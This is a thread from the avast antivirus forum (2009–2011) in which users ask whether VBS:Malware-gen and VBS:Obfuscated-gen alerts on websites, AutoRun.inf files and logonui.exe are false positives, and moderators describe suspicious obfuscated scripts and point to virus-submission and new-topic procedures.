Post by: DavidR on March 02, 2009, 09:05:37 PM
Getting Malware-gen for hXXp://icamaxi.se, any idea if it's a FP?

As kubecj said not a false positive, a big chunk of javascript (which I have edited to make it easier to see in the image) trying to look like an advert script, but it has an obfuscated link at the end of it. There should be no legitimate reason to do that, e.g. what are they trying to hide.

So it looks like the site has been hacked.

Please modify your post change the http to hXXp to break the link to avoid accidental exposure (as in the quoted text above).
Title: Re: VBS:Malware-gen
Post by: chaz4j on July 14, 2009, 02:42:22 PM
I plugged in my digital camera and the virus notification came up and said I had VBS:Malware-gen, so I put it in the virus chest and scanned it and it said it was in this file AutoRun.inf. I just had to completely wipe, format and reinstall Vista the other day due to not having an antivirus, and the first thing I did when I got it running was download avast. I know for sure there's nothing up with my laptop...

If anyone could help me please do!



Title: Re: VBS:Malware-gen
Post by: DavidR on July 14, 2009, 03:12:42 PM
This is somewhat different from what is covered here (hacked web sites) and is for a different malware name.

- Please start a New Topic of your own as this seems unrelated to the original subject and will just confuse the topic and we will try to help. 
- Go to this link, http://forum.avast.com/index.php (http://forum.avast.com/index.php), scroll down to the Viruses and Worms forum and click it, click the New Topic button at the top of the list and post there.
Title: Re: VBS:Malware-gen
Post by: iamhitbytrojan on August 07, 2009, 06:29:38 PM
It says Malware name: VBS:Obfuscated-gen [trj]

Malware type:  Trojan Horse


I clicked on www.thtndc.org
avast 4.8 database 090806-1 08/06 also popped up and warned me of VBS:Obfuscated-gen [trj]
This site was a good one and meant no harm.
Can someone check it please to see if there is any more trojan or malware?

Please also check www.phiatruoc.net as it is a site administered by the same team of the above.
Title: Re: VBS:Malware-gen
Post by: DavidR on August 07, 2009, 06:44:44 PM
Well it tries to install a chat-room client without asking the user, which at best is downright rude and at worst possibly malicious.

It is also creating an applet and an object where it appears to be hiding (obfuscating) what the purpose is and I don't like what it tries to do directly in the C:\ drive.

avast isn't alone in thinking there is something wrong with this, http://www.virustotal.com/analisis/d430171aface541b88b199daef5962168ec1686e0ab2d8cb95ea9f85dfecea59-1249663618 (http://www.virustotal.com/analisis/d430171aface541b88b199daef5962168ec1686e0ab2d8cb95ea9f85dfecea59-1249663618)
Title: Re: VBS:Malware-gen
Post by: mefite on August 12, 2009, 07:10:03 PM
--post removed-- wrong section
Title: Re: VBS:Malware-gen
Post by: spg SCOTT on August 12, 2009, 07:17:19 PM
Hello

Please can you start  a new topic as your problem is unrelated to the original poster's and will cause some confusion.

Also, please can you modify your post (and change your next one) to break the link (i.e.change http to hXXp)

Thanks,

-Scott-

(http://sites.google.com/site/spg20scottsweb/_/rsrc/1249295824755/home/images/starting-a-new-topic/New%20Topic.gif)
Title: Re: VBS:Malware-gen
Post by: mefite on August 12, 2009, 07:18:37 PM
Sorry bout that.  Will do.
Title: Re: VBS:Malware-gen
Post by: DavidR on August 12, 2009, 07:33:35 PM
When you do, I didn't find anything, so some more info is required.

I have just visited the home page hXXp://www.greenbeanery.ca/bean/home.php with firefox 3.5.2 and I had no alert, so if you can be more specific on the URL where the alert lies - Please 'modify' your post change the URL from http to hXXp or www to wXw (as in my example), to break the link and avoid accidental exposure to suspect sites, thanks.

Since I'm on dial-up and the site is media rich, it takes forever to load, so I can't go browsing in the hope of finding it.
Title: Re: VBS:Malware-gen
Post by: auloon on January 29, 2010, 02:22:40 PM
Hello,

yesterday, just when closing the computer (Windows XP SP2), Avast (virus base updated) showed the alert VBS-malware-gen in logonui.exe and blocked the computer. Today, after the restart, I checked logonui.exe with Avast - same problem. Avast proposes to cure it, I accept, then it proposes to replace the file with a sane copy, I accept, and the alert re-appears again and again.

I have no idea where the virus came from. To check with an alternative means, I launched CureIt!, which also ran in Win32, and it didn't find anything suspicious. Could it be an Avast error or should I really worry?

Thank you for help! 
Title: Re: VBS:Malware-gen
Post by: Milos on January 29, 2010, 02:43:00 PM
Hello,
send us (virus@avast.com) the file to analyze and put "False positive" in the subject. But "VBS-malware-gen" in an .exe looks suspicious at first look (VBS is Visual Basic Script -- a text file, not binary).

Thank you
Milos
Title: Re: VBS:Malware-gen
Post by: Ashish Sardana on September 14, 2011, 06:44:48 AM
Please help me also, I am having a problem with the file D:/autorun.inf and it's showing on the screen again and again that the file is infected with vbs:malware-gen. Please, someone help, how do I remove this  :-\

Thank You
Title: Re: VBS:Malware-gen
Post by: Pondus on September 14, 2011, 07:07:59 AM
Please help me also, I am having a problem with the file D:/autorun.inf and it's showing on the screen again and again that the file is infected with vbs:malware-gen. Please, someone help, how do I remove this  :-\

Thank You
Read this   http://forum.avast.com/index.php?topic=53253.0